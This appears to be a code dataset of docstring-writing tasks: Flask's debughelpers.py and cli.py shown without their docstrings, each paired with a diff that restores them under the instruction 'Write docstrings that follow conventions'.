" 'multipart/form-data' which means that no file contents"
" were transmitted. To fix this error you should provide"
' enctype="multipart/form-data" in your form.'
]
if form_matches:
names = ", ".join(repr(x) for x in form_matches)
buf.append(
"\n\nThe browser instead transmitted some file names. "
f"This was submitted: {names}"
)
self.msg = "".join(buf)
def __str__(self) -> str:
return self.msg
class FormDataRoutingRedirect(AssertionError):
def __init__(self, request: Request) -> None:
exc = request.routing_exception
assert isinstance(exc, RequestRedirect)
buf = [
f"A request was sent to '{request.url}', but routing issued"
f" a redirect to the canonical URL '{exc.new_url}'."
]
if f"{request.base_url}/" == exc.new_url.partition("?")[0]:
buf.append(
" The URL was defined with a trailing slash. Flask"
" will redirect to the URL with a trailing slash if it"
" was accessed without one."
)
buf.append(
" Send requests to the canonical URL, or use 307 or 308 for"
" routing redirects. Otherwise, browsers will drop form"
" data.\n\n"
"This exception is only raised in debug mode."
)
super().__init__("".join(buf))
def attach_enctype_error_multidict(request: Request) -> None:
oldcls = request.files.__class__
class newcls(oldcls): # type: ignore[valid-type, misc]
def __getitem__(self, key: str) -> t.Any:
try:
return super().__getitem__(key)
except KeyError as e:
if key not in request.form:
raise
raise DebugFilesKeyError(request, key).with_traceback(
e.__traceback__
) from None
newcls.__name__ = oldcls.__name__
newcls.__module__ = oldcls.__module__
request.files.__class__ = newcls
def _dump_loader_info(loader: BaseLoader) -> t.Iterator[str]:
yield f"class: {type(loader).__module__}.{type(loader).__name__}"
for key, value in sorted(loader.__dict__.items()):
if key.startswith("_"):
continue
if isinstance(value, (tuple, list)):
if not all(isinstance(x, str) for x in value):
continue
yield f"{key}:"
for item in value:
yield f" - {item}"
continue
elif not isinstance(value, (str, int, float, bool)):
continue
yield f"{key}: {value!r}"
def explain_template_loading_attempts(
app: App,
template: str,
attempts: list[
tuple[
BaseLoader,
Scaffold,
tuple[str, str | None, t.Callable[[], bool] | None] | None,
]
],
) -> None:
info = [f"Locating template {template!r}:"]
total_found = 0
blueprint = None
if (ctx := _cv_app.get(None)) is not None and ctx.has_request:
blueprint = ctx.request.blueprint
for idx, (loader, srcobj, triple) in enumerate(attempts):
if isinstance(srcobj, App):
src_info = f"application {srcobj.import_name!r}"
elif isinstance(srcobj, Blueprint):
src_info = f"blueprint {srcobj.name!r} ({srcobj.import_name})"
else:
src_info = repr(srcobj)
info.append(f"{idx + 1:5}: trying loader of {src_info}")
for line in _dump_loader_info(loader):
info.append(f" {line}")
if triple is None:
detail = "no match"
else:
detail = f"found ({triple[1] or '<string>'!r})"
total_found += 1
info.append(f" -> {detail}")
seems_fishy = False
if total_found == 0:
info.append("Error: the template could not be found.")
seems_fishy = True
elif total_found > 1:
info.append("Warning: multiple loaders returned a match for the template.")
seems_fishy = True
if blueprint is not None and seems_fishy:
info.append(
" The template was looked up from an endpoint that belongs"
f" to the blueprint {blueprint!r}."
)
info.append(" Maybe you did not place a template in the right folder?")
info.append(" See https://flask.palletsprojects.com/blueprints/#templates")
app.logger.info("\n".join(info)) | --- +++ @@ -15,9 +15,15 @@
class UnexpectedUnicodeError(AssertionError, UnicodeError):
+ """Raised in places where we want some better error reporting for
+ unexpected unicode or binary data.
+ """
class DebugFilesKeyError(KeyError, AssertionError):
+ """Raised from request.files during debugging. The idea is that it can
+ provide a better error message than just a generic KeyError/BadRequest.
+ """
def __init__(self, request: Request, key: str) -> None:
form_matches = request.form.getlist(key)
@@ -42,6 +48,11 @@
class FormDataRoutingRedirect(AssertionError):
+ """This exception is raised in debug mode if a routing redirect
+ would cause the browser to drop the method or body. This happens
+ when method is not GET, HEAD or OPTIONS and the status code is not
+ 307 or 308.
+ """
def __init__(self, request: Request) -> None:
exc = request.routing_exception
@@ -68,6 +79,12 @@
def attach_enctype_error_multidict(request: Request) -> None:
+ """Patch ``request.files.__getitem__`` to raise a descriptive error
+ about ``enctype=multipart/form-data``.
+
+ :param request: The request to patch.
+ :meta private:
+ """
oldcls = request.files.__class__
class newcls(oldcls): # type: ignore[valid-type, misc]
@@ -115,6 +132,7 @@ ]
],
) -> None:
+ """This should help developers understand what failed"""
info = [f"Locating template {template!r}:"]
total_found = 0
blueprint = None
@@ -158,4 +176,4 @@ info.append(" Maybe you did not place a template in the right folder?")
info.append(" See https://flask.palletsprojects.com/blueprints/#templates")
- app.logger.info("\n".join(info))+ app.logger.info("\n".join(info))
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/debughelpers.py |
Write docstrings that follow conventions | from __future__ import annotations
import ast
import collections.abc as cabc
import importlib.metadata
import inspect
import os
import platform
import re
import sys
import traceback
import typing as t
from functools import update_wrapper
from operator import itemgetter
from types import ModuleType
import click
from click.core import ParameterSource
from werkzeug import run_simple
from werkzeug.serving import is_running_from_reloader
from werkzeug.utils import import_string
from .globals import current_app
from .helpers import get_debug_flag
from .helpers import get_load_dotenv
if t.TYPE_CHECKING:
import ssl
from _typeshed.wsgi import StartResponse
from _typeshed.wsgi import WSGIApplication
from _typeshed.wsgi import WSGIEnvironment
from .app import Flask
class NoAppException(click.UsageError):
def find_best_app(module: ModuleType) -> Flask:
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for v in module.__dict__.values() if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
"Detected multiple Flask applications in module"
f" '{module.__name__}'. Use '{module.__name__}:name'"
" to specify the correct one."
)
# Search for app factory functions.
for attr_name in ("create_app", "make_app"):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = app_factory()
if isinstance(app, Flask):
return app
except TypeError as e:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
f"Detected factory '{attr_name}' in module '{module.__name__}',"
" but could not call it without arguments. Use"
f" '{module.__name__}:{attr_name}(args)'"
" to specify arguments."
) from e
raise NoAppException(
"Failed to find Flask application or factory in module"
f" '{module.__name__}'. Use '{module.__name__}:name'"
" to specify one."
)
def _called_with_wrong_args(f: t.Callable[..., Flask]) -> bool:
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is f.__code__:
# In the function, it was called successfully.
return False
tb = tb.tb_next
# Didn't reach the function.
return True
finally:
# Delete tb to break a circular reference.
# https://docs.python.org/2/library/sys.html#sys.exc_info
del tb
def find_app_by_string(module: ModuleType, app_name: str) -> Flask:
from . import Flask
# Parse app_name as a single expression to determine if it's a valid
# attribute name or function call.
try:
expr = ast.parse(app_name.strip(), mode="eval").body
except SyntaxError:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
) from None
if isinstance(expr, ast.Name):
name = expr.id
args = []
kwargs = {}
elif isinstance(expr, ast.Call):
# Ensure the function name is an attribute name only.
if not isinstance(expr.func, ast.Name):
raise NoAppException(
f"Function reference must be a simple name: {app_name!r}."
)
name = expr.func.id
# Parse the positional and keyword arguments as literals.
try:
args = [ast.literal_eval(arg) for arg in expr.args]
kwargs = {
kw.arg: ast.literal_eval(kw.value)
for kw in expr.keywords
if kw.arg is not None
}
except ValueError:
# literal_eval gives cryptic error messages, show a generic
# message with the full expression instead.
raise NoAppException(
f"Failed to parse arguments as literal values: {app_name!r}."
) from None
else:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
)
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(
f"Failed to find attribute {name!r} in {module.__name__!r}."
) from e
# If the attribute is a function, call it with any args and kwargs
# to get the real application.
if inspect.isfunction(attr):
try:
app = attr(*args, **kwargs)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
f"The factory {app_name!r} in module"
f" {module.__name__!r} could not be called with the"
" specified arguments."
) from e
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from"
f" '{module.__name__}:{app_name}'."
)
def prepare_import(path: str) -> str:
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == ".py":
path = fname
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
@t.overload
def locate_app(
module_name: str, app_name: str | None, raise_if_not_found: t.Literal[True] = True
) -> Flask: ...
@t.overload
def locate_app(
module_name: str, app_name: str | None, raise_if_not_found: t.Literal[False] = ...
) -> Flask | None: ...
def locate_app(
module_name: str, app_name: str | None, raise_if_not_found: bool = True
) -> Flask | None:
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[2].tb_next: # type: ignore[union-attr]
raise NoAppException(
f"While importing {module_name!r}, an ImportError was"
f" raised:\n\n{traceback.format_exc()}"
) from None
elif raise_if_not_found:
raise NoAppException(f"Could not import {module_name!r}.") from None
else:
return None
module = sys.modules[module_name]
if app_name is None:
return find_best_app(module)
else:
return find_app_by_string(module, app_name)
def get_version(ctx: click.Context, param: click.Parameter, value: t.Any) -> None:
if not value or ctx.resilient_parsing:
return
flask_version = importlib.metadata.version("flask")
werkzeug_version = importlib.metadata.version("werkzeug")
click.echo(
f"Python {platform.python_version()}\n"
f"Flask {flask_version}\n"
f"Werkzeug {werkzeug_version}",
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the Flask version.",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class ScriptInfo:
def __init__(
self,
app_import_path: str | None = None,
create_app: t.Callable[..., Flask] | None = None,
set_debug_flag: bool = True,
load_dotenv_defaults: bool = True,
) -> None:
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data: dict[t.Any, t.Any] = {}
self.set_debug_flag = set_debug_flag
self.load_dotenv_defaults = get_load_dotenv(load_dotenv_defaults)
"""Whether default ``.flaskenv`` and ``.env`` files should be loaded.
``ScriptInfo`` doesn't load anything, this is for reference when doing
the load elsewhere during processing.
.. versionadded:: 3.1
"""
self._loaded_app: Flask | None = None
def load_app(self) -> Flask:
if self._loaded_app is not None:
return self._loaded_app
app: Flask | None = None
if self.create_app is not None:
app = self.create_app()
else:
if self.app_import_path:
path, name = (
re.split(r":(?![\\/])", self.app_import_path, maxsplit=1) + [None]
)[:2]
import_name = prepare_import(path)
app = locate_app(import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(import_name, None, raise_if_not_found=False)
if app is not None:
break
if app is None:
raise NoAppException(
"Could not locate a Flask application. Use the"
" 'flask --app' option, 'FLASK_APP' environment"
" variable, or a 'wsgi.py' or 'app.py' file in the"
" current directory."
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
F = t.TypeVar("F", bound=t.Callable[..., t.Any])
def with_appcontext(f: F) -> F:
@click.pass_context
def decorator(ctx: click.Context, /, *args: t.Any, **kwargs: t.Any) -> t.Any:
if not current_app:
app = ctx.ensure_object(ScriptInfo).load_app()
ctx.with_resource(app.app_context())
return ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f) # type: ignore[return-value]
class AppGroup(click.Group):
def command( # type: ignore[override]
self, *args: t.Any, **kwargs: t.Any
) -> t.Callable[[t.Callable[..., t.Any]], click.Command]:
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f: t.Callable[..., t.Any]) -> click.Command:
if wrap_for_ctx:
f = with_appcontext(f)
return super(AppGroup, self).command(*args, **kwargs)(f) # type: ignore[no-any-return]
return decorator
def group( # type: ignore[override]
self, *args: t.Any, **kwargs: t.Any
) -> t.Callable[[t.Callable[..., t.Any]], click.Group]:
kwargs.setdefault("cls", AppGroup)
return super().group(*args, **kwargs) # type: ignore[no-any-return]
def _set_app(ctx: click.Context, param: click.Option, value: str | None) -> str | None:
if value is None:
return None
info = ctx.ensure_object(ScriptInfo)
info.app_import_path = value
return value
# This option is eager so the app will be available if --help is given.
# --help is also eager, so --app must be before it in the param list.
# no_args_is_help bypasses eager processing, so this option must be
# processed manually in that case to ensure FLASK_APP gets picked up.
_app_option = click.Option(
["-A", "--app"],
metavar="IMPORT",
help=(
"The Flask application or factory function to load, in the form 'module:name'."
" Module can be a dotted import or file path. Name is not required if it is"
" 'app', 'application', 'create_app', or 'make_app', and can be 'name(args)' to"
" pass arguments."
),
is_eager=True,
expose_value=False,
callback=_set_app,
)
def _set_debug(ctx: click.Context, param: click.Option, value: bool) -> bool | None:
# If the flag isn't provided, it will default to False. Don't use
# that, let debug be set by env in that case.
source = ctx.get_parameter_source(param.name) # type: ignore[arg-type]
if source is not None and source in (
ParameterSource.DEFAULT,
ParameterSource.DEFAULT_MAP,
):
return None
# Set with env var instead of ScriptInfo.load so that it can be
# accessed early during a factory function.
os.environ["FLASK_DEBUG"] = "1" if value else "0"
return value
_debug_option = click.Option(
["--debug/--no-debug"],
help="Set debug mode.",
expose_value=False,
callback=_set_debug,
)
def _env_file_callback(
ctx: click.Context, param: click.Option, value: str | None
) -> str | None:
try:
import dotenv # noqa: F401
except ImportError:
# Only show an error if a value was passed, otherwise we still want to
# call load_dotenv and show a message without exiting.
if value is not None:
raise click.BadParameter(
"python-dotenv must be installed to load an env file.",
ctx=ctx,
param=param,
) from None
# Load if a value was passed, or we want to load default files, or both.
if value is not None or ctx.obj.load_dotenv_defaults:
load_dotenv(value, load_defaults=ctx.obj.load_dotenv_defaults)
return value
# This option is eager so env vars are loaded as early as possible to be
# used by other options.
_env_file_option = click.Option(
["-e", "--env-file"],
type=click.Path(exists=True, dir_okay=False),
help=(
"Load environment variables from this file, taking precedence over"
" those set by '.env' and '.flaskenv'. Variables set directly in the"
" environment take highest precedence. python-dotenv must be installed."
),
is_eager=True,
expose_value=False,
callback=_env_file_callback,
)
class FlaskGroup(AppGroup):
def __init__(
self,
add_default_commands: bool = True,
create_app: t.Callable[..., Flask] | None = None,
add_version_option: bool = True,
load_dotenv: bool = True,
set_debug_flag: bool = True,
**extra: t.Any,
) -> None:
params: list[click.Parameter] = list(extra.pop("params", None) or ())
# Processing is done with option callbacks instead of a group
# callback. This allows users to make a custom group callback
# without losing the behavior. --env-file must come first so
# that it is eagerly evaluated before --app.
params.extend((_env_file_option, _app_option, _debug_option))
if add_version_option:
params.append(version_option)
if "context_settings" not in extra:
extra["context_settings"] = {}
extra["context_settings"].setdefault("auto_envvar_prefix", "FLASK")
super().__init__(params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self) -> None:
if self._loaded_plugin_commands:
return
for ep in importlib.metadata.entry_points(group="flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx: click.Context, name: str) -> click.Command | None:
self._load_plugin_commands()
# Look up built-in and plugin commands, which should be
# available even if the app fails to load.
rv = super().get_command(ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
# Look up commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
app = info.load_app()
except NoAppException as e:
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
return None
# Push an app context for the loaded app unless it is already
# active somehow. This makes the context available to parameter
# and command callbacks without needing @with_appcontext.
if not current_app or current_app._get_current_object() is not app:
ctx.with_resource(app.app_context())
return app.cli.get_command(ctx, name)
def list_commands(self, ctx: click.Context) -> list[str]:
self._load_plugin_commands()
# Start with the built-in and plugin commands.
rv = set(super().list_commands(ctx))
info = ctx.ensure_object(ScriptInfo)
# Add commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
rv.update(info.load_app().cli.list_commands(ctx))
except NoAppException as e:
# When an app couldn't be loaded, show the error message
# without the traceback.
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
except Exception:
# When any other errors occurred during loading, show the
# full traceback.
click.secho(f"{traceback.format_exc()}\n", err=True, fg="red")
return sorted(rv)
def make_context(
self,
info_name: str | None,
args: list[str],
parent: click.Context | None = None,
**extra: t.Any,
) -> click.Context:
# Set a flag to tell app.run to become a no-op. If app.run was
# not in a __name__ == __main__ guard, it would start the server
# when importing, blocking whatever command is being called.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if "obj" not in extra and "obj" not in self.context_settings:
extra["obj"] = ScriptInfo(
create_app=self.create_app,
set_debug_flag=self.set_debug_flag,
load_dotenv_defaults=self.load_dotenv,
)
return super().make_context(info_name, args, parent=parent, **extra)
def parse_args(self, ctx: click.Context, args: list[str]) -> list[str]:
if (not args and self.no_args_is_help) or (
len(args) == 1 and args[0] in self.get_help_option_names(ctx)
):
# Attempt to load --env-file and --app early in case they
# were given as env vars. Otherwise no_args_is_help will not
# see commands from app.cli.
_env_file_option.handle_parse_result(ctx, {}, [])
_app_option.handle_parse_result(ctx, {}, [])
return super().parse_args(ctx, args)
def _path_is_ancestor(path: str, other: str) -> bool:
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
def load_dotenv(
path: str | os.PathLike[str] | None = None, load_defaults: bool = True
) -> bool:
try:
import dotenv
except ImportError:
if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"):
click.secho(
" * Tip: There are .env files present. Install python-dotenv"
" to use them.",
fg="yellow",
err=True,
)
return False
data: dict[str, str | None] = {}
if load_defaults:
for default_name in (".flaskenv", ".env"):
if not (default_path := dotenv.find_dotenv(default_name, usecwd=True)):
continue
data |= dotenv.dotenv_values(default_path, encoding="utf-8")
if path is not None and os.path.isfile(path):
data |= dotenv.dotenv_values(path, encoding="utf-8")
for key, value in data.items():
if key in os.environ or value is None:
continue
os.environ[key] = value
return bool(data) # True if at least one env var was loaded.
def show_server_banner(debug: bool, app_import_path: str | None) -> None:
if is_running_from_reloader():
return
if app_import_path is not None:
click.echo(f" * Serving Flask app '{app_import_path}'")
if debug is not None:
click.echo(f" * Debug mode: {'on' if debug else 'off'}")
class CertParamType(click.ParamType):
name = "path"
def __init__(self) -> None:
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(
self, value: t.Any, param: click.Parameter | None, ctx: click.Context | None
) -> t.Any:
try:
import ssl
except ImportError:
raise click.BadParameter(
'Using "--cert" requires Python to be compiled with SSL support.',
ctx,
param,
) from None
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
import cryptography # noqa: F401
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires the cryptography library.",
ctx,
param,
) from None
return value
obj = import_string(value, silent=True)
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx: click.Context, param: click.Parameter, value: t.Any) -> t.Any:
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
try:
import ssl
except ImportError:
is_context = False
else:
is_context = isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key" is not used.',
ctx,
param,
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
class SeparatedPathType(click.Path):
def convert(
self, value: t.Any, param: click.Parameter | None, ctx: click.Context | None
) -> t.Any:
items = self.split_envvar_value(value)
# can't call no-arg super() inside list comprehension until Python 3.12
super_convert = super().convert
return [super_convert(item, param, ctx) for item in items]
@click.command("run", short_help="Run a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert",
type=CertParamType(),
help="Specify a certificate file to use HTTPS.",
is_eager=True,
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@click.option(
"--extra-files",
default=None,
type=SeparatedPathType(),
help=(
"Extra files that trigger a reload on change. Multiple paths"
f" are separated by {os.path.pathsep!r}."
),
)
@click.option(
"--exclude-patterns",
default=None,
type=SeparatedPathType(),
help=(
"Files matching these fnmatch patterns will not trigger a reload"
" on change. Multiple patterns are separated by"
f" {os.path.pathsep!r}."
),
)
@pass_script_info
def run_command(
info: ScriptInfo,
host: str,
port: int,
reload: bool,
debugger: bool,
with_threads: bool,
cert: ssl.SSLContext | tuple[str, str | None] | t.Literal["adhoc"] | None,
extra_files: list[str] | None,
exclude_patterns: list[str] | None,
) -> None:
try:
app: WSGIApplication = info.load_app() # pyright: ignore
except Exception as e:
if is_running_from_reloader():
# When reloading, print out the error immediately, but raise
# it later so the debugger or server can handle it.
traceback.print_exc()
err = e
def app(
environ: WSGIEnvironment, start_response: StartResponse
) -> cabc.Iterable[bytes]:
raise err from None
else:
# When not reloading, raise the error immediately so the
# command fails.
raise e from None
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
show_server_banner(debug, info.app_import_path)
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
extra_files=extra_files,
exclude_patterns=exclude_patterns,
)
run_command.params.insert(0, _debug_option)
@click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command() -> None:
import code
banner = (
f"Python {sys.version} on {sys.platform}\n"
f"App: {current_app.import_name}\n"
f"Instance: {current_app.instance_path}"
)
ctx: dict[str, t.Any] = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup) as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(current_app.make_shell_context())
# Site, customize, or startup script can set a hook to call when
# entering interactive mode. The default one sets up readline with
# tab and history completion.
interactive_hook = getattr(sys, "__interactivehook__", None)
if interactive_hook is not None:
try:
import readline
from rlcompleter import Completer
except ImportError:
pass
else:
# rlcompleter uses __main__.__dict__ by default, which is
# flask.__main__. Use the shell context instead.
readline.set_completer(Completer(ctx).complete)
interactive_hook()
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "domain", "rule", "match")),
default="endpoint",
help=(
"Method to sort routes by. 'match' is the order that Flask will match routes"
" when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort: str, all_methods: bool) -> None:
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set() if all_methods else {"HEAD", "OPTIONS"}
host_matching = current_app.url_map.host_matching
has_domain = any(rule.host if host_matching else rule.subdomain for rule in rules)
rows = []
for rule in rules:
row = [
rule.endpoint,
", ".join(sorted((rule.methods or set()) - ignored_methods)),
]
if has_domain:
row.append((rule.host if host_matching else rule.subdomain) or "")
row.append(rule.rule)
rows.append(row)
headers = ["Endpoint", "Methods"]
sorts = ["endpoint", "methods"]
if has_domain:
headers.append("Host" if host_matching else "Subdomain")
sorts.append("domain")
headers.append("Rule")
sorts.append("rule")
try:
rows.sort(key=itemgetter(sorts.index(sort)))
except ValueError:
pass
rows.insert(0, headers)
widths = [max(len(row[i]) for row in rows) for i in range(len(headers))]
rows.insert(1, ["-" * w for w in widths])
template = " ".join(f"{{{i}:<{w}}}" for i, w in enumerate(widths))
for row in rows:
click.echo(template.format(*row))
cli = FlaskGroup(
name="flask",
help="""\
A general utility script for Flask applications.
An application to load must be given with the '--app' option,
'FLASK_APP' environment variable, or with a 'wsgi.py' or 'app.py' file
in the current directory.
""",
)
def main() -> None:
cli.main()
if __name__ == "__main__":
main() | --- +++ @@ -35,9 +35,13 @@
class NoAppException(click.UsageError):
+ """Raised if an application cannot be found or loaded."""
def find_best_app(module: ModuleType) -> Flask:
+ """Given a module instance this tries to find the best possible
+ application in the module or raises an exception.
+ """
from . import Flask
# Search for the most common names first.
@@ -88,6 +92,13 @@
def _called_with_wrong_args(f: t.Callable[..., Flask]) -> bool:
+ """Check whether calling a function raised a ``TypeError`` because
+ the call failed or because something in the factory raised the
+ error.
+
+ :param f: The function that was called.
+ :return: ``True`` if the call failed.
+ """
tb = sys.exc_info()[2]
try:
@@ -107,6 +118,9 @@
def find_app_by_string(module: ModuleType, app_name: str) -> Flask:
+ """Check if the given string is a variable name or a function. Call
+ a function to get the app instance, or return the variable directly.
+ """
from . import Flask
# Parse app_name as a single expression to determine if it's a valid
@@ -184,6 +198,9 @@
def prepare_import(path: str) -> str:
+ """Given a filename this will try to calculate the python path, add it
+ to the search path and return the actual module name that is expected.
+ """
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
@@ -274,6 +291,16 @@
class ScriptInfo:
+ """Helper object to deal with Flask applications. This is usually not
+ necessary to interface with as it's used internally in the dispatching
+ to click. In future versions of Flask this object will most likely play
+ a bigger role. Typically it's created automatically by the
+ :class:`FlaskGroup` but you can also manually create it and pass it
+ onwards as click object.
+
+ .. versionchanged:: 3.1
+ Added the ``load_dotenv_defaults`` parameter and attribute.
+ """
def __init__(
self,
@@ -304,6 +331,10 @@ self._loaded_app: Flask | None = None
def load_app(self) -> Flask:
+ """Loads the Flask app (if not yet loaded) and returns it. Calling
+ this multiple times will just result in the already loaded app to
+ be returned.
+ """
if self._loaded_app is not None:
return self._loaded_app
app: Flask | None = None
@@ -347,6 +378,18 @@
def with_appcontext(f: F) -> F:
+ """Wraps a callback so that it's guaranteed to be executed with the
+ script's application context.
+
+ Custom commands (and their options) registered under ``app.cli`` or
+ ``blueprint.cli`` will always have an app context available, this
+ decorator is not required in that case.
+
+ .. versionchanged:: 2.2
+ The app context is active for subcommands as well as the
+ decorated callback. The app context is always available to
+ ``app.cli`` command and parameter callbacks.
+ """
@click.pass_context
def decorator(ctx: click.Context, /, *args: t.Any, **kwargs: t.Any) -> t.Any:
@@ -360,10 +403,20 @@
class AppGroup(click.Group):
+ """This works similar to a regular click :class:`~click.Group` but it
+ changes the behavior of the :meth:`command` decorator so that it
+ automatically wraps the functions in :func:`with_appcontext`.
+
+ Not to be confused with :class:`FlaskGroup`.
+ """
def command( # type: ignore[override]
self, *args: t.Any, **kwargs: t.Any
) -> t.Callable[[t.Callable[..., t.Any]], click.Command]:
+ """This works exactly like the method of the same name on a regular
+ :class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
+ unless it's disabled by passing ``with_appcontext=False``.
+ """
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f: t.Callable[..., t.Any]) -> click.Command:
@@ -376,6 +429,10 @@ def group( # type: ignore[override]
self, *args: t.Any, **kwargs: t.Any
) -> t.Callable[[t.Callable[..., t.Any]], click.Group]:
+ """This works exactly like the method of the same name on a regular
+ :class:`click.Group` but it defaults the group class to
+ :class:`AppGroup`.
+ """
kwargs.setdefault("cls", AppGroup)
return super().group(*args, **kwargs) # type: ignore[no-any-return]
@@ -472,6 +529,36 @@
class FlaskGroup(AppGroup):
+ """Special subclass of the :class:`AppGroup` group that supports
+ loading more commands from the configured Flask app. Normally a
+ developer does not have to interface with this class but there are
+ some very advanced use cases for which it makes sense to create an
+ instance of this. see :ref:`custom-scripts`.
+
+ :param add_default_commands: if this is True then the default run and
+ shell commands will be added.
+ :param add_version_option: adds the ``--version`` option.
+ :param create_app: an optional callback that is passed the script info and
+ returns the loaded app.
+ :param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
+ files to set environment variables. Will also change the working
+ directory to the directory containing the first file found.
+ :param set_debug_flag: Set the app's debug flag.
+
+ .. versionchanged:: 3.1
+ ``-e path`` takes precedence over default ``.env`` and ``.flaskenv`` files.
+
+ .. versionchanged:: 2.2
+ Added the ``-A/--app``, ``--debug/--no-debug``, ``-e/--env-file`` options.
+
+ .. versionchanged:: 2.2
+ An app context is pushed when running ``app.cli`` commands, so
+ ``@with_appcontext`` is no longer required for those commands.
+
+ .. versionchanged:: 1.0
+ If installed, python-dotenv will be used to load environment variables
+ from :file:`.env` and :file:`.flaskenv` files.
+ """
def __init__(
self,
@@ -602,12 +689,46 @@
def _path_is_ancestor(path: str, other: str) -> bool:
+ """Take ``other`` and remove the length of ``path`` from it. Then join it
+ to ``path``. If it is the original value, ``path`` is an ancestor of
+ ``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
def load_dotenv(
path: str | os.PathLike[str] | None = None, load_defaults: bool = True
) -> bool:
+ """Load "dotenv" files to set environment variables. A given path takes
+ precedence over ``.env``, which takes precedence over ``.flaskenv``. After
+ loading and combining these files, values are only set if the key is not
+ already set in ``os.environ``.
+
+ This is a no-op if `python-dotenv`_ is not installed.
+
+ .. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
+
+ :param path: Load the file at this location.
+ :param load_defaults: Search for and load the default ``.flaskenv`` and
+ ``.env`` files.
+ :return: ``True`` if at least one env var was loaded.
+
